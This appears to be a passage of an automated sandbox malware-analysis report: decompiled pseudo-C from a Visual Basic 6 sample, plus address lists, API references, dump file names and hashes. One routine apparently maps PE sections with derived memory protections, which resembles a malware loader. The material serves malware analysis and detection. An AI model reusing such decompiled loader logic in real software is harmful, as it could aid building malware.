                                                        																									goto L81;
                                                        																								} else {
                                                        																									_t341 = _t340 + _t532;
                                                        																									__eflags = _t341;
                                                        																									if(_t341 < 0) {
                                                        																										goto L81;
                                                        																									} else {
                                                        																										goto L72;
                                                        																									}
                                                        																								}
                                                        																							} else {
                                                        																								_t341 = _t339 & 0x0000ffff;
                                                        																								L72:
                                                        																								_push(_t341);
                                                        																								_push(_t401);
                                                        																								_t342 = E00424040();
                                                        																								_t562 = _t562 + 4;
                                                        																								__eflags = _t562;
                                                        																								_v1288 = _t342;
                                                        																								_push( &_v1292);
                                                        																								if(_t562 < 0) {
                                                        																									goto L81;
                                                        																								} else {
                                                        																									_t344 = E004240A0();
                                                        																									_push(4);
                                                        																									_push(_t562);
                                                        																									_push(_t344);
                                                        																									E00424000();
                                                        																									_t346 = E004240A0( &_v1296);
                                                        																									_push(4);
                                                        																									_push(_t346);
                                                        																									_t507 = _v1280 + _t532;
                                                        																									__eflags = _t507;
                                                        																									if(_t507 < 0) {
                                                        																										goto L81;
                                                        																									} else {
                                                        																										_push(_t507);
                                                        																										E00424000();
                                                        																										_t349 = _v1272 + 4;
                                                        																										__eflags = _t349;
                                                        																										if(_t349 < 0) {
                                                        																											goto L81;
                                                        																										} else {
                                                        																											goto L75;
                                                        																										}
                                                        																									}
                                                        																								}
                                                        																							}
                                                        																							goto L136;
                                                        																							L75:
                                                        																							_v1260 = _t349;
                                                        																							_t339 = _v1284;
                                                        																							__eflags = _t339;
                                                        																						}
                                                        																						goto L76;
                                                        																					}
                                                        																				}
                                                        																			}
                                                        																		}
                                                        																	} else {
                                                        																		__eflags = _v1272;
                                                        																		if(_v1272 == 0) {
                                                        																			__eflags = 0;
                                                        																			return 0;
                                                        																		} else {
                                                        																			L76:
                                                        																			_t562 = _v1256 + 0x14;
                                                        																			__eflags = _t562;
                                                        																			if(_t562 < 0) {
                                                        																				goto L81;
                                                        																			} else {
                                                        																				continue;
                                                        																			}
                                                        																		}
                                                        																	}
                                                        																}
                                                        															}
                                                        															goto L136;
                                                        															L60:
                                                        															__eflags = _t333;
                                                        															goto L61;
                                                        														}
                                                        													}
                                                        												}
                                                        											}
                                                        										} else {
                                                        											return 2;
                                                        										}
                                                        									}
                                                        								} else {
                                                        									return 1;
                                                        								}
                                                        							} else {
                                                        								_t354 = _t259 + 0x14;
                                                        								__eflags = _t354;
                                                        								if(_t354 < 0) {
                                                        									goto L44;
                                                        								} else {
                                                        									_t355 = _t354 + _t491;
                                                        									__eflags = _t355;
                                                        									if(_t355 < 0) {
                                                        										goto L44;
                                                        									} else {
                                                        										_t529 = _t355;
                                                        										_t357 = _v922 - 1;
                                                        										__eflags = _t357;
                                                        										if(_t357 < 0) {
                                                        											goto L44;
                                                        										} else {
                                                        											_t588 = _t357;
                                                        											__eflags = _t588;
                                                        											if(_t588 < 0) {
                                                        												return 0;
                                                        											} else {
                                                        												while(1) {
                                                        													_t359 = E004240A0( &_v968);
                                                        													_push(0x28);
                                                        													_push(_t529);
                                                        													_push(_t359);
                                                        													E00424000();
                                                        													_t361 = _v948;
                                                        													__eflags = _t361 & 0x20000000;
                                                        													if((_t361 & 0x20000000) == 0) {
                                                        														__eflags = _t361 & 0x40000000;
                                                        														if((_t361 & 0x40000000) == 0) {
                                                        															asm("sbb eax, eax");
                                                        															_t365 = ( ~(_t361 & 0x80000000) & 0x00000007) + 1;
                                                        															__eflags = _t365;
                                                        														} else {
                                                        															asm("sbb eax, eax");
                                                        															_t365 = ( ~(_t361 & 0x80000000) & 0x00000002) + 2;
                                                        														}
                                                        													} else {
                                                        														__eflags = _t361 & 0x40000000;
                                                        														if((_t361 & 0x40000000) == 0) {
                                                        															asm("sbb eax, eax");
                                                        															_t365 = ( ~(_t361 & 0x80000000) & 0x00000070) + 0x10;
                                                        														} else {
                                                        															asm("sbb eax, eax");
                                                        															_t365 = ( ~(_t361 & 0x80000000) & 0x00000020) + 0x20;
                                                        														}
                                                        													}
                                                        													_push(E004240A0( &_v972));
                                                        													_push(_t365);
                                                        													_t561 = _v680;
                                                        													_t467 = _v960 + _t561;
                                                        													__eflags = _t467;
                                                        													_push(_v964);
                                                        													if(_t467 < 0) {
                                                        														goto L44;
                                                        													}
                                                        													_push(_t467);
                                                        													_t368 = E00423FE0();
                                                        													__eflags = _t368;
                                                        													if(_t368 == 0) {
                                                        														return 4;
                                                        													} else {
                                                        														_t529 = _t529 + 0x28;
                                                        														__eflags = _t529;
                                                        														if(_t529 < 0) {
                                                        															goto L44;
                                                        														} else {
                                                        															_t401 = _t401 + 1;
                                                        															__eflags = _t401;
                                                        															if(_t401 < 0) {
                                                        																goto L44;
                                                        															} else {
                                                        																__eflags = _t401 - _t588;
                                                        																if(_t401 <= _t588) {
                                                        																	continue;
                                                        																} else {
                                                        																	__eflags = 0;
                                                        																	return 0;
                                                        																}
                                                        															}
                                                        														}
                                                        													}
                                                        													goto L136;
                                                        												}
                                                        												goto L44;
                                                        											}
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        						} else {
                                                        							return 1;
                                                        						}
                                                        					}
                                                        				} else {
                                                        					E00423FC0(_t227, _t227);
                                                        					asm("wait");
                                                        					_t586 = __imp____vbaFreeVar;
                                                        					 *_t586(0x423337);
                                                        					 *_t586();
                                                        					 *_t586();
                                                        					return  *_t586();
                                                        				}
                                                        				goto L136;
                                                        			}













































































































































































































                                                        0x004230d0
                                                        0x004230d1
                                                        0x004230d3
                                                        0x004230e2
                                                        0x004230e9
                                                        0x004230f2
                                                        0x004230f5
                                                        0x004230fc
                                                        0x0042310c
                                                        0x0042310c
                                                        0x00423118
                                                        0x0042311b
                                                        0x0042311e
                                                        0x00423124
                                                        0x0042312a
                                                        0x00423130
                                                        0x00423136
                                                        0x00423138
                                                        0x0042313e
                                                        0x00423144
                                                        0x0042314a
                                                        0x00423150
                                                        0x00423156
                                                        0x00423167
                                                        0x00423170
                                                        0x00423186
                                                        0x0042318c
                                                        0x00423192
                                                        0x004231a2
                                                        0x004231b2
                                                        0x004231b5
                                                        0x004231bc
                                                        0x004231c8
                                                        0x004231d7
                                                        0x004231d7
                                                        0x004231d9
                                                        0x004231e0
                                                        0x004231f2
                                                        0x004231fc
                                                        0x00423204
                                                        0x00423205
                                                        0x00423206
                                                        0x00423211
                                                        0x00423213
                                                        0x0042321e
                                                        0x0042321f
                                                        0x0042322a
                                                        0x0042322b
                                                        0x00423236
                                                        0x00423237
                                                        0x00423242
                                                        0x00423243
                                                        0x00423248
                                                        0x0042324d
                                                        0x0042324f
                                                        0x00423254
                                                        0x00423255
                                                        0x00423256
                                                        0x00423256
                                                        0x0042325b
                                                        0x00423261
                                                        0x00423270
                                                        0x0042327a
                                                        0x0042327c
                                                        0x00423282
                                                        0x0042328d
                                                        0x0042328d
                                                        0x00423293
                                                        0x004232ab
                                                        0x004232b5
                                                        0x004232bf
                                                        0x004232cd
                                                        0x004232ce
                                                        0x004232d4
                                                        0x00000000
                                                        0x00000000
                                                        0x004232d6
                                                        0x004232d6
                                                        0x004232ea
                                                        0x004232ea
                                                        0x004232ec
                                                        0x00423351
                                                        0x0042335d
                                                        0x00423368
                                                        0x00423369
                                                        0x0042336d
                                                        0x0042336e
                                                        0x00423372
                                                        0x00423373
                                                        0x0042337c
                                                        0x0042339a
                                                        0x0042339a
                                                        0x0042339c
                                                        0x0042339e
                                                        0x004233a0
                                                        0x004233a4
                                                        0x004233b1
                                                        0x004233b4
                                                        0x004233bd
                                                        0x004233be
                                                        0x004233c0
                                                        0x004233c1
                                                        0x004233c2
                                                        0x004233c3
                                                        0x004233c8
                                                        0x004233cd
                                                        0x00423425
                                                        0x00423425
                                                        0x00423427
                                                        0x00423429
                                                        0x00423429
                                                        0x0042342e
                                                        0x00423430
                                                        0x00423437
                                                        0x0042343c
                                                        0x0042343e
                                                        0x0042343f
                                                        0x00423440
                                                        0x00423440
                                                        0x0042344a
                                                        0x0042344f
                                                        0x00423455
                                                        0x00423456
                                                        0x00423457
                                                        0x00423460
                                                        0x00423468
                                                        0x0042346c
                                                        0x00423471
                                                        0x00423473
                                                        0x00423478
                                                        0x00423479
                                                        0x00423483
                                                        0x00423488
                                                        0x0042348e
                                                        0x0042348f
                                                        0x00423490
                                                        0x0042349a
                                                        0x0042349f
                                                        0x004234a5
                                                        0x004234a6
                                                        0x004234a7
                                                        0x004234b0
                                                        0x004234b5
                                                        0x004234ba
                                                        0x004234bc
                                                        0x004234c1
                                                        0x004234c2
                                                        0x004234d2
                                                        0x004233cf
                                                        0x004233cf
                                                        0x004233d3
                                                        0x004233d3
                                                        0x004233d6
                                                        0x00000000
                                                        0x00000000
                                                        0x004233dc
                                                        0x004233de
                                                        0x004233e2
                                                        0x004233e4
                                                        0x004233e9
                                                        0x004233ea
                                                        0x004233ec
                                                        0x004233ed
                                                        0x004233ed
                                                        0x004233f2
                                                        0x004233fb
                                                        0x004233fc
                                                        0x004233fe
                                                        0x00423404
                                                        0x00423406
                                                        0x00423413
                                                        0x00423414
                                                        0x00423415
                                                        0x00423416
                                                        0x00423418
                                                        0x00423419
                                                        0x0042341e
                                                        0x00423423
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00423423
                                                        0x004234d5
                                                        0x004234e6
                                                        0x004234e7
                                                        0x004234e8
                                                        0x004234e9
                                                        0x004234f5
                                                        0x004234f7
                                                        0x004234fe
                                                        0x00423502
                                                        0x00423502
                                                        0x00423502
                                                        0x0042350f
                                                        0x00423511
                                                        0x00423515
                                                        0x00423517
                                                        0x0042351c
                                                        0x0042351e
                                                        0x00423532
                                                        0x00423537
                                                        0x00423537
                                                        0x0042353a
                                                        0x00423647
                                                        0x00423647
                                                        0x00423656
                                                        0x00423657
                                                        0x00423658
                                                        0x00423664
                                                        0x00423664
                                                        0x00423666
                                                        0x0042366d
                                                        0x00423671
                                                        0x00423677
                                                        0x0042367f
                                                        0x00423681
                                                        0x00423685
                                                        0x00423689
                                                        0x0042368b
                                                        0x0042368f
                                                        0x00423693
                                                        0x00423697
                                                        0x0042369b
                                                        0x004236a0
                                                        0x004236a2
                                                        0x004236b5
                                                        0x004236bd
                                                        0x00423838
                                                        0x00423843
                                                        0x004236c3
                                                        0x004236c7
                                                        0x004236cb
                                                        0x004236d0
                                                        0x004236d2
                                                        0x004236e9
                                                        0x004236eb
                                                        0x00000000
                                                        0x004236f1
                                                        0x004236f1
                                                        0x004236f5
                                                        0x004236f7
                                                        0x00000000
                                                        0x004236fd
                                                        0x004236fd
                                                        0x004236fd
                                                        0x004236ff
                                                        0x00423846
                                                        0x00423846
                                                        0x00423856
                                                        0x00423857
                                                        0x00423858
                                                        0x00423864
                                                        0x00423864
                                                        0x00423866
                                                        0x00423873
                                                        0x00423875
                                                        0x00423879
                                                        0x0042387d
                                                        0x0042387f
                                                        0x00423883
                                                        0x00423887
                                                        0x0042388b
                                                        0x0042388f
                                                        0x00423894
                                                        0x00423896
                                                        0x004238a9
                                                        0x004238af
                                                        0x004238af
                                                        0x004238b1
                                                        0x00423a29
                                                        0x00423a29
                                                        0x00423a30
                                                        0x00423a33
                                                        0x00423a36
                                                        0x00423a41
                                                        0x00423a42
                                                        0x00423a4f
                                                        0x00423a50
                                                        0x00423a51
                                                        0x00423a52
                                                        0x00423a55
                                                        0x00423a69
                                                        0x00423a76
                                                        0x00423a78
                                                        0x00423a7e
                                                        0x00423a84
                                                        0x00423a8a
                                                        0x00423a8f
                                                        0x00423a91
                                                        0x00423aa7
                                                        0x00423aad
                                                        0x00423ab9
                                                        0x00423ab9
                                                        0x00423abf
                                                        0x00423ad4
                                                        0x00423ad7
                                                        0x00423ad9
                                                        0x00423adb
                                                        0x00423af0
                                                        0x00423add
                                                        0x00423add
                                                        0x00423aec
                                                        0x00423aec
                                                        0x00423af6
                                                        0x00423afc
                                                        0x00423b08
                                                        0x00423b08
                                                        0x00423b0e
                                                        0x00423b23
                                                        0x00423b26
                                                        0x00423b28
                                                        0x00423b2a
                                                        0x00423b35
                                                        0x00423b35
                                                        0x00423b3d
                                                        0x00423b5f
                                                        0x00423b74
                                                        0x00423b76
                                                        0x00423b7f
                                                        0x00423b81
                                                        0x00423c7a
                                                        0x00423c7a
                                                        0x00423c7d
                                                        0x00423c82
                                                        0x00000000
                                                        0x00423b87
                                                        0x00423b87
                                                        0x00423b8e
                                                        0x00423ba4
                                                        0x00423ba9
                                                        0x00423bab
                                                        0x00423bb7
                                                        0x00423bb7
                                                        0x00423bbd
                                                        0x00423bd2
                                                        0x00423bd5
                                                        0x00423bd7
                                                        0x00423bd9
                                                        0x00423be4
                                                        0x00423be4
                                                        0x00423be6
                                                        0x00423beb
                                                        0x00423bed
                                                        0x00423bf9
                                                        0x00423bf9
                                                        0x00423bff
                                                        0x00423c14
                                                        0x00423c17
                                                        0x00423c19
                                                        0x00423c1b
                                                        0x00423c26
                                                        0x00423c26
                                                        0x00423c45
                                                        0x00423c5a
                                                        0x00423c5c
                                                        0x00423c65
                                                        0x00423c67
                                                        0x00000000
                                                        0x00000000
                                                        0x00423c69
                                                        0x00423c73
                                                        0x00000000
                                                        0x00423c73
                                                        0x00423b90
                                                        0x00423b9a
                                                        0x00000000
                                                        0x00423b9a
                                                        0x00423a93
                                                        0x00423a93
                                                        0x00423a9d
                                                        0x00000000
                                                        0x00423a9d
                                                        0x00423a91
                                                        0x004238b7
                                                        0x004238b9
                                                        0x004238bd
                                                        0x00423a1b
                                                        0x00423a26
                                                        0x004238c3
                                                        0x004238c7
                                                        0x004238cb
                                                        0x004238d0
                                                        0x004238d2
                                                        0x004238e5
                                                        0x004238e9
                                                        0x00000000
                                                        0x004238ef
                                                        0x004238ef
                                                        0x004238f3
                                                        0x004238f5
                                                        0x00000000
                                                        0x004238fb
                                                        0x004238fb
                                                        0x004238fb
                                                        0x00423901
                                                        0x00000000
                                                        0x00000000
                                                        0x00423908
                                                        0x0042390a
                                                        0x0042390f
                                                        0x00423911
                                                        0x00423912
                                                        0x00423913
                                                        0x00423918
                                                        0x0042391c
                                                        0x00000000
                                                        0x00423922
                                                        0x00423922
                                                        0x00423923
                                                        0x00423923
                                                        0x00423929
                                                        0x00423929
                                                        0x0042392c
                                                        0x0042392e
                                                        0x00000000
                                                        0x00000000
                                                        0x00423934
                                                        0x00423934
                                                        0x00423937
                                                        0x00000000
                                                        0x00000000
                                                        0x0042393d
                                                        0x00423942
                                                        0x00423944
                                                        0x00423946
                                                        0x0042394c
                                                        0x0042394c
                                                        0x00423951
                                                        0x00423956
                                                        0x00423958
                                                        0x00423959
                                                        0x0042395a
                                                        0x0042395f
                                                        0x00423965
                                                        0x00423966
                                                        0x00423974
                                                        0x00423976
                                                        0x00423982
                                                        0x00423982
                                                        0x00423988
                                                        0x00000000
                                                        0x00000000
                                                        0x0042398e
                                                        0x0042398e
                                                        0x00423990
                                                        0x00423991
                                                        0x00000000
                                                        0x00000000
                                                        0x00423997
                                                        0x00423999
                                                        0x0042399e
                                                        0x004239a0
                                                        0x004239a1
                                                        0x004239a2
                                                        0x004239af
                                                        0x004239af
                                                        0x004239b1
                                                        0x004239b5
                                                        0x00000000
                                                        0x00000000
                                                        0x004239b8
                                                        0x004239bc
                                                        0x004239c1
                                                        0x004239c3
                                                        0x004239c4
                                                        0x004239c5
                                                        0x004239ca
                                                        0x004239ca
                                                        0x004239d1
                                                        0x004239d1
                                                        0x004239d4
                                                        0x00000000
                                                        0x00000000
                                                        0x004239d6
                                                        0x004239d6
                                                        0x004239d9
                                                        0x00000000
                                                        0x00000000
                                                        0x004239db
                                                        0x004239db
                                                        0x004239e3
                                                        0x004239e3
                                                        0x004239e7
                                                        0x004239e7
                                                        0x004239ed
                                                        0x00000000
                                                        0x00000000
                                                        0x004239f0
                                                        0x004239f2
                                                        0x004239f7
                                                        0x004239f9
                                                        0x004239fa
                                                        0x004239fb
                                                        0x00423a04
                                                        0x00423a06
                                                        0x00000000
                                                        0x00000000
                                                        0x00423a0f
                                                        0x00423a18
                                                        0x00000000
                                                        0x00423a18
                                                        0x00000000
                                                        0x00423923
                                                        0x0042391c
                                                        0x004238f5
                                                        0x004238d4
                                                        0x004238e2
                                                        0x004238e2
                                                        0x004238d2
                                                        0x00423898
                                                        0x004238a6
                                                        0x004238a6
                                                        0x00423705
                                                        0x00423705
                                                        0x00423707
                                                        0x0042370b
                                                        0x00423710
                                                        0x00423715
                                                        0x00423717
                                                        0x00423718
                                                        0x00423719
                                                        0x00423722
                                                        0x00423724
                                                        0x00423728
                                                        0x00000000
                                                        0x00000000
                                                        0x0042372e
                                                        0x00423730
                                                        0x00000000
                                                        0x00423732
                                                        0x00423736
                                                        0x00423738
                                                        0x00000000
                                                        0x0042373a
                                                        0x0042373a
                                                        0x0042373c
                                                        0x00423751
                                                        0x00423751
                                                        0x00000000
                                                        0x00423757
                                                        0x00423757
                                                        0x00423757
                                                        0x00423759
                                                        0x00000000
                                                        0x0042375f
                                                        0x0042375f
                                                        0x00423765
                                                        0x00423767
                                                        0x00423769
                                                        0x00423827
                                                        0x0042376f
                                                        0x0042376f
                                                        0x00423773
                                                        0x00423775
                                                        0x00423777
                                                        0x00423777
                                                        0x0042377f
                                                        0x0042377f
                                                        0x00423781
                                                        0x00423782
                                                        0x00000000
                                                        0x00423788
                                                        0x00423788
                                                        0x0042378d
                                                        0x0042378f
                                                        0x00423790
                                                        0x00423791
                                                        0x00423796
                                                        0x0042379a
                                                        0x0042379c
                                                        0x0042379e
                                                        0x004237a7
                                                        0x004237a7
                                                        0x004237aa
                                                        0x00000000
                                                        0x004237b0
                                                        0x004237b0
                                                        0x004237b0
                                                        0x004237b2
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004237b2
                                                        0x004237a0
                                                        0x004237a0
                                                        0x004237b8
                                                        0x004237b8
                                                        0x004237b9
                                                        0x004237ba
                                                        0x004237bf
                                                        0x004237bf
                                                        0x004237c2
                                                        0x004237ca
                                                        0x004237cb
                                                        0x00000000
                                                        0x004237cd
                                                        0x004237cd
                                                        0x004237d2
                                                        0x004237d4
                                                        0x004237d5
                                                        0x004237d6
                                                        0x004237e0
                                                        0x004237e5
                                                        0x004237e7
                                                        0x004237ec
                                                        0x004237ec
                                                        0x004237ee
                                                        0x00000000
                                                        0x004237f0
                                                        0x004237f0
                                                        0x004237f1
                                                        0x004237fa
                                                        0x004237fa
                                                        0x004237fd
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004237fd
                                                        0x004237ee
                                                        0x004237cb
                                                        0x00000000
                                                        0x004237ff
                                                        0x004237ff
                                                        0x00423803
                                                        0x00423807
                                                        0x00423807
                                                        0x00000000
                                                        0x0042379c
                                                        0x00423782
                                                        0x00423769
                                                        0x00423759
                                                        0x0042373e
                                                        0x00423742
                                                        0x00423744
                                                        0x0042382c
                                                        0x00423835
                                                        0x0042374a
                                                        0x0042380b
                                                        0x0042380f
                                                        0x0042380f
                                                        0x00423812
                                                        0x00000000
                                                        0x00423814
                                                        0x00000000
                                                        0x00423814
                                                        0x00423812
                                                        0x00423744
                                                        0x0042373c
                                                        0x00423738
                                                        0x00000000
                                                        0x0042374f
                                                        0x0042374f
                                                        0x00000000
                                                        0x0042374f
                                                        0x00423707
                                                        0x004236ff
                                                        0x004236f7
                                                        0x004236d4
                                                        0x004236e2
                                                        0x004236e2
                                                        0x004236d2
                                                        0x004236a4
                                                        0x004236b2
                                                        0x004236b2
                                                        0x00423540
                                                        0x00423540
                                                        0x00423540
                                                        0x00423543
                                                        0x00000000
                                                        0x00423549
                                                        0x00423549
                                                        0x00423549
                                                        0x0042354b
                                                        0x00000000
                                                        0x00423551
                                                        0x00423551
                                                        0x00423558
                                                        0x00423558
                                                        0x0042355c
                                                        0x00000000
                                                        0x00423562
                                                        0x00423562
                                                        0x00423565
                                                        0x00423567
                                                        0x00423644
                                                        0x0042356d
                                                        0x0042356d
                                                        0x00423572
                                                        0x00423577
                                                        0x00423579
                                                        0x0042357a
                                                        0x0042357b
                                                        0x00423580
                                                        0x00423584
                                                        0x00423589
                                                        0x004235b4
                                                        0x004235b9
                                                        0x004235d3
                                                        0x004235d8
                                                        0x004235d8
                                                        0x004235bb
                                                        0x004235c2
                                                        0x004235c7
                                                        0x004235c7
                                                        0x0042358b
                                                        0x0042358b
                                                        0x00423590
                                                        0x004235aa
                                                        0x004235af
                                                        0x00423592
                                                        0x00423599
                                                        0x0042359e
                                                        0x0042359e
                                                        0x00423590
                                                        0x004235e5
                                                        0x004235e6
                                                        0x004235eb
                                                        0x004235f6
                                                        0x004235f6
                                                        0x004235f8
                                                        0x004235f9
                                                        0x00000000
                                                        0x00000000
                                                        0x004235fb
                                                        0x004235fc
                                                        0x00423601
                                                        0x00423603
                                                        0x00423635
                                                        0x00423605
                                                        0x00423605
                                                        0x00423605
                                                        0x00423608
                                                        0x00000000
                                                        0x0042360a
                                                        0x0042360a
                                                        0x0042360a
                                                        0x0042360d
                                                        0x00000000
                                                        0x0042360f
                                                        0x0042360f
                                                        0x00423611
                                                        0x00000000
                                                        0x00423617
                                                        0x0042361a
                                                        0x00423623
                                                        0x00423623
                                                        0x00423611
                                                        0x0042360d
                                                        0x00423608
                                                        0x00000000
                                                        0x00423603
                                                        0x00000000
                                                        0x0042356d
                                                        0x00423567
                                                        0x0042355c
                                                        0x0042354b
                                                        0x00423543
                                                        0x00423520
                                                        0x0042352f
                                                        0x0042352f
                                                        0x0042351e
                                                        0x004232ee
                                                        0x004232ef
                                                        0x004232f4
                                                        0x00423316
                                                        0x0042331f
                                                        0x00423324
                                                        0x0042332c
                                                        0x00423336
                                                        0x00423336
                                                        0x00000000

                                                        APIs
                                                        • __vbaCheckTypeVar.MSVBVM60(?,00411A18,?,?), ref: 00423167
                                                        • __vbaVarLateMemCallLd.MSVBVM60(?,?,hwnd,00000000), ref: 00423186
                                                        • __vbaI4Var.MSVBVM60(?,00000001,?), ref: 004231A8
                                                        • __vbaI4Var.MSVBVM60(?,00000000), ref: 004231B2
                                                        • __vbaSetSystemError.MSVBVM60(00000000), ref: 004231BC
                                                        • __vbaFreeVar.MSVBVM60 ref: 004231C8
                                                        • __vbaVarMove.MSVBVM60 ref: 004231FC
                                                        • #535.MSVBVM60(?,?,?,?,?,?,?,?), ref: 0042325B
                                                        • __vbaVarMove.MSVBVM60 ref: 0042327A
                                                        • #535.MSVBVM60 ref: 0042328D
                                                        • __vbaVarSub.MSVBVM60(?,?,00000004), ref: 004232C5
                                                        • __vbaVarTstLt.MSVBVM60(?,00000000), ref: 004232CF
                                                        • #598.MSVBVM60 ref: 004232D6
                                                        • __vbaFreeVar.MSVBVM60(00423337,?), ref: 0042331F
                                                        • __vbaFreeVar.MSVBVM60 ref: 00423324
                                                        • __vbaFreeVar.MSVBVM60 ref: 0042332C
                                                        • __vbaFreeVar.MSVBVM60 ref: 00423334
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$Free$#535Move$#598CallCheckErrorLateSystemType
                                                        • String ID: hwnd
                                                        • API String ID: 631025523-1070177613
                                                        • Opcode ID: c0b122c8a111f0edc5e92aa2e3e53d813209fdaff6da07b4683dadb3b830457c
                                                        • Instruction ID: fe5d10b2d917b570d85bf457c80aed235935dcd3a65971487dd3497630d20b78
                                                        • Opcode Fuzzy Hash: c0b122c8a111f0edc5e92aa2e3e53d813209fdaff6da07b4683dadb3b830457c
                                                        • Instruction Fuzzy Hash: 4D5149B1A00268ABDB20DF64DD85BDEB778EF88701F4044DAE509B7250DB785B85CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 20%
                                                        			E00417770(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr* _a8) {
                                                        				intOrPtr* _v0;
                                                        				char _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr _v16;
                                                        				intOrPtr _v24;
                                                        				char _v28;
                                                        				char _v32;
                                                        				char _v36;
                                                        				intOrPtr _v40;
                                                        				void* _v44;
                                                        				intOrPtr _v52;
                                                        				intOrPtr _v56;
                                                        				intOrPtr _v64;
                                                        				intOrPtr _v68;
                                                        				char _v72;
                                                        				intOrPtr _v84;
                                                        				intOrPtr _v88;
                                                        				intOrPtr _v92;
                                                        				char _v104;
                                                        				char _v108;
                                                        				intOrPtr* _v140;
                                                        				intOrPtr* _v144;
                                                        				intOrPtr _v156;
                                                        				intOrPtr _v160;
                                                        				intOrPtr _v164;
                                                        				char _v176;
                                                        				intOrPtr _v180;
                                                        				intOrPtr _v184;
                                                        				char _v192;
                                                        				char _v196;
                                                        				intOrPtr _v212;
                                                        				void* _v280;
                                                        				intOrPtr* _v284;
                                                        				char _v296;
                                                        				intOrPtr _v300;
                                                        				intOrPtr _v304;
                                                        				char _v320;
                                                        				char _v324;
                                                        				intOrPtr _t96;
                                                        				void* _t102;
                                                        				intOrPtr _t103;
                                                        				void* _t106;
                                                        				char* _t108;
                                                        				char* _t110;
                                                        				void* _t111;
                                                        				intOrPtr* _t113;
                                                        				intOrPtr* _t116;
                                                        				void* _t120;
                                                        				intOrPtr* _t121;
                                                        				intOrPtr _t126;
                                                        				void* _t129;
                                                        				intOrPtr _t136;
                                                        				intOrPtr _t142;
                                                        				intOrPtr _t153;
                                                        				void* _t159;
                                                        				intOrPtr _t163;
                                                        				intOrPtr* _t169;
                                                        				intOrPtr* _t176;
                                                        				intOrPtr* _t177;
                                                        				intOrPtr* _t178;
                                                        				intOrPtr* _t179;
                                                        				intOrPtr* _t180;
                                                        				void* _t183;
                                                        				void* _t184;
                                                        				intOrPtr _t185;
                                                        				intOrPtr _t186;
                                                        				void* _t190;
                                                        				intOrPtr _t191;
                                                        				intOrPtr _t192;
                                                        				intOrPtr _t193;
                                                        				intOrPtr _t194;
                                                        				intOrPtr _t195;
                                                        				intOrPtr _t196;
                                                        				intOrPtr _t197;
                                                        
                                                        				_t120 = __ebx;
                                                        				_t184 = _t190;
                                                        				_t191 = _t190 - 0xc;
                                                        				 *[fs:0x0] = _t191;
                                                        				_t192 = _t191 - 0x14;
                                                        				_v16 = _t192;
                                                        				_v12 = 0x401468;
                                                        				_v8 = 0;
                                                        				_t176 = _a4;
                                                        				 *((intOrPtr*)( *_t176 + 4))(_t176, __edi, __esi, __ebx,  *[fs:0x0], 0x401d26, _t183);
                                                        				_t6 = _t176 + 0x70; // 0x80001
                                                        				_v28 = 0;
                                                        				_v32 = 0;
                                                        				_v36 = 0;
                                                        				E0040F5DC();
                                                        				__imp____vbaSetSystemError( *_t6, 0xb0,  &_v28,  &_v32);
                                                        				_t126 = _v32 - _v28;
                                                        				if(_t126 < 0) {
                                                        					__imp____vbaErrorOverflow();
                                                        					0;
                                                        					_t185 = _t192;
                                                        					_t193 = _t192 - 0xc;
                                                        					 *[fs:0x0] = _t193;
                                                        					_t194 = _t193 - 0x10;
                                                        					_v92 = _t194;
                                                        					_v88 = 0x401470;
                                                        					_v84 = 0;
                                                        					_t177 = _v72;
                                                        					 *((intOrPtr*)( *_t177 + 4))(_t177, 0, _t176, __ebx,  *[fs:0x0], 0x401d26, _t184);
                                                        					_t26 = _t177 + 0x70; // 0x80003
                                                        					_v104 = 0;
                                                        					_v108 = 0;
                                                        					E0040F5DC();
                                                        					_t169 = __imp____vbaSetSystemError;
                                                        					 *_t169( *_t26, 0xb0,  &_v104,  &_v108);
                                                        					_t96 = _v104;
                                                        					_t129 = _t96 + _v68;
                                                        					_t33 = _t177 + 0x70; // 0x80003
                                                        					_t153 =  *_t33;
                                                        					if(_t129 < 0) {
                                                        						__imp____vbaErrorOverflow();
                                                        						_t186 = _t194;
                                                        						_t195 = _t194 - 0xc;
                                                        						 *[fs:0x0] = _t195;
                                                        						_t196 = _t195 - 0x48;
                                                        						_v164 = _t196;
                                                        						_v160 = 0x401478;
                                                        						_v156 = 0;
                                                        						_t178 = _v144;
                                                        						 *((intOrPtr*)( *_t178 + 4))(_t178, _t169, _t177, __ebx,  *[fs:0x0], 0x401d26, _t185);
                                                        						 *_v140 = 0;
                                                        						_t46 = _t178 + 0x70; // 0x4180df
                                                        						_v176 = 0;
                                                        						_v180 = 0;
                                                        						_v184 = 0;
                                                        						_v192 = 0;
                                                        						_v196 = 0;
                                                        						_v212 = 0;
                                                        						E0040F5DC();
                                                        						__imp____vbaSetSystemError( *_t46, 0xb0,  &_v176,  &_v192);
                                                        						_t102 =  *((intOrPtr*)( *_t178 + 0x860))(_t178,  &_v196);
                                                        						if(_t102 < 0) {
                                                        							__imp____vbaHresultCheckObj(_t102, _t178, 0x40f460, 0x860);
                                                        						}
                                                        						_t179 = __imp____vbaStrMove;
                                                        						_v56 = 0;
                                                        						_t103 =  *_t179();
                                                        						__imp____vbaLenBstr(_v40);
                                                        						if(_t103 == 0) {
                                                        							L12:
                                                        							__imp____vbaStrCopy();
                                                        							goto L13;
                                                        						} else {
                                                        							_t136 = _v52;
                                                        							_t103 = _v36;
                                                        							_t159 = _t136 - _t103;
